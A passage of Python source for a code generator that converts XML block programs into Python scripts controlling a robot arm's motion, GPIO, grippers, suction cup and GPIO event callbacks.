values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move tool line and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tool_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tool_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius_fields = self.get_nodes('value', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
values = '[{}]'.format(','.join(values))
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius = values.pop()
values = '[{}]'.format(','.join(values))
if self._show_comment:
try:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
except:
pass
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_motion_set_state(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
state = fields[0].text
if self._show_comment:
self._append_to_file('{}# set state'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_state({})'.format(prefix, state))
def _handle_motion_stop(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# emergency stop'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.emergency_stop()'.format(prefix))
def _handle_studio_run_traj(self, block, prefix='', arg_map=None):
filename = self.get_node('field', root=block).text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True)'.format(prefix, times, filename))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_app_studio_traj(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
filename = fields[0].text
speed = fields[1].text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True, double_speed={})'.format(prefix, times, filename, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_tool_message(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = json.dumps(fields[-1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[-1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, message))
# self._append_to_file('{}print(\'{{}}\'.format(\'{}\'))'.format(prefix, message))
def _handle_tool_console(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = json.dumps(fields[1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, msg))
def _handle_tool_console_with_variable(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = fields[1].text
# msg = json.dumps(fields[1].text, ensure_ascii=False)
value = self.get_node('value', block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}value = {}'.format(prefix, expression))
prefix = self.__check_is_quit(prefix)
if msg:
self._append_to_file('{}print({}.format({}))'.format(prefix, json.dumps(msg+'{}', ensure_ascii=False), expression))
# self._append_to_file('{}pprint(\'{}{{}}\'.format({}))'.format(prefix, msg, expression))
else:
self._append_to_file('{}print(\'{{}}\'.format({}))'.format(prefix, expression))
def _handle_wait(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} time.sleep({})'.format(prefix, value))
def _handle_gpio_get_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_get_suction_cup(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# get suction cup status'.format(prefix))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_suction_cup()'.format(prefix))
def _handle_check_air_pump_state(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check air pump state'.format(prefix))
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_air_pump_state({}, timeout={})'.format(prefix, state, timeout))
def _handle_check_bio_gripper_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check bio gripper is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_bio_gripper_is_catch(timeout={})'.format(prefix, timeout))
def _handle_check_robotiq_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check robotiq is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_robotiq_is_catch(timeout={})'.format(prefix, timeout))
def _handle_set_suction_cup(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='trigger')
on = True if fields[0].text == 'ON' else False
fields = self.get_nodes('field', root=block, name='wait')
if fields and len(fields) > 0:
wait = fields[0].text == 'TRUE'
else:
wait = False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_suction_cup, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_get_controller_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_digital_di(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_controller_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = fields[5].text
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} analog with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog({}, {})'.format(prefix, io, value))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog, code={{}}\'.format(code))'.format(prefix))
def _handle_set_collision_sensitivity(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_collision_sensitivity({})'.format(prefix, value))
    def _handle_set_teach_sensitivity(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_teach_sensitivity({})'.format(prefix, value))
def _handle_set_tcp_load(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
weight = fields[1].text
x = fields[2].text
y = fields[3].text
z = fields[4].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{} arm.set_state(0)'.format(prefix))
# self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# weight = self.get_nodes('field', root=values[0], descendant=True)[0].text
# x = self.get_nodes('field', root=values[1], descendant=True)[0].text
# y = self.get_nodes('field', root=values[2], descendant=True)[0].text
# z = self.get_nodes('field', root=values[3], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_gravity_direction(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
x = self.get_nodes('field', root=values[0], descendant=True)[0].text
y = self.get_nodes('field', root=values[1], descendant=True)[0].text
z = self.get_nodes('field', root=values[2], descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_gravity_direction([{}, {}, {}])'.format(prefix, x, y, z))
def _handle_set_tcp_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_offset([{}, {}, {}, {}, {}, {}], wait=True)'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# x = self.get_nodes('field', root=values[0], descendant=True)[0].text
# y = self.get_nodes('field', root=values[1], descendant=True)[0].text
# z = self.get_nodes('field', root=values[2], descendant=True)[0].text
# roll = self.get_nodes('field', root=values[3], descendant=True)[0].text
# pitch = self.get_nodes('field', root=values[4], descendant=True)[0].text
# yaw = self.get_nodes('field', root=values[5], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_world_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_world_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
def _handle_gripper_set(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
if fields is not None and len(fields) >= 3:
pos = fields[0].text
speed = fields[1].text
wait = fields[2].text == 'TRUE'
else:
values = self.get_nodes('value', root=block)
pos = self.get_nodes('field', root=values[0], descendant=True)[0].text
speed = self.get_nodes('field', root=values[1], descendant=True)[0].text
wait = self.get_nodes('field', root=values[2], descendant=True)[0].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# set gripper position and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_gripper_position({}, wait={}, speed={}, auto_enable=True)'.format(prefix, pos, wait, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_position, code={{}}\'.format(code))'.format(prefix))
def _handle_gripper_set_status(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
status = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
if self._show_comment:
self._append_to_file('{}# set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm._arm.set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_status, code={{}}\'.format(code))'.format(prefix))
def _handle_set_bio_gripper_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_bio_gripper_enable, code={{}}\'.format(code))'.format(prefix))
# self._append_to_file('{}expired = time.time() + 2'.format(prefix))
# self._append_to_file('{}while not params[\'quit\'] and time.time() < expired:'.format(prefix))
# self._append_to_file('{} time.sleep(0.1)'.format(prefix))
def _handle_set_bio_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
on = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if on:
if self._show_comment:
self._append_to_file('{}# open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'open_bio_gripper, code={{}}\'.format(code))'.format(prefix))
else:
if self._show_comment:
self._append_to_file('{}# close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'close_bio_gripper, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_robotiq_init()'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_reset()'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_reset, code={{}}\'.format(code))'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_activate(wait=True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_activate, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='pos')
pos = int(fields[0].text)
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='force')
force = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if self._show_comment:
self._append_to_file('{}# robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_position, code={{}}\'.format(code))'.format(prefix))
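    # Emit callback registration code for GPIO-triggered events; the generated
    # script polls GPIO state in EventGPIOThread and fires callbacks on edges.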
def __handle_gpio_event(self, gpio_type, block, prefix='', arg_map=None):
if gpio_type.startswith('listen'):
if gpio_type == 'listen_tgpio_digital':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_digital = True'.format(prefix))
elif gpio_type == 'listen_tgpio_analog':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_analog = True'.format(prefix))
elif gpio_type == 'listen_cgpio_state':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_cgpio_state = True'.format(prefix))
else:
return
old_prefix = prefix
else:
fields = self.get_nodes('field', root=block)
io = fields[0].text
trigger = fields[1].text
if 'gpio' not in self._events:
num = 1
else:
if gpio_type not in self._events['gpio']:
num = 1
else:
num = self._events['gpio'][gpio_type] + 1
if gpio_type == 'tgpio_digital':
name = 'tool_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} DIGITAL is changed callback'.format(prefix, io))
elif gpio_type == 'tgpio_analog':
name = 'tool_gpio_{}_analog_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} ANALOG is changed callback'.format(prefix, io))
            elif gpio_type == 'cgpio_digital':
                name = 'controller_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
                self._append_to_file('\n\n{}# Define Controller GPIO-{} DIGITAL is {} callback'.format(prefix, io, trigger))
            elif gpio_type == 'cgpio_analog':
                name = 'controller_gpio_{}_analog_is_changed_callback_{}'.format(io, num)
                self._append_to_file('\n\n{}# Define Controller GPIO-{} ANALOG is changed callback'.format(prefix, io))
else:
return
self._append_to_file('{}def {}():'.format(prefix, name))
old_prefix = prefix
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
self._append_to_file('{}def _callback():'.format(prefix))
self.parse(statement, prefix + ' ', arg_map=arg_map)
self._append_to_file('{}_callback() if not params[\'callback_in_thread\'] else threading.Thread(target=_callback, daemon=True).start()'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
if gpio_type == 'tgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_digital_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'==\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
elif gpio_type == 'tgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_analog_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
elif gpio_type == 'cgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'digital\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, '==', name))
elif gpio_type == 'cgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'analog\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
else:
return
self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
if 'gpio' not in self._events:
name2 = 'EventGPIOThread'
self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
'\n threading.Thread.__init__(self, *args, **kwargs)')
self._insert_to_file(self.index, ' self.daemon = True')
self._insert_to_file(self.index, ' self.alive = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = False')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = False')
self._insert_to_file(self.index, ' self.listen_tgpio_digital = False')
self._insert_to_file(self.index, ' self.listen_tgpio_analog = False')
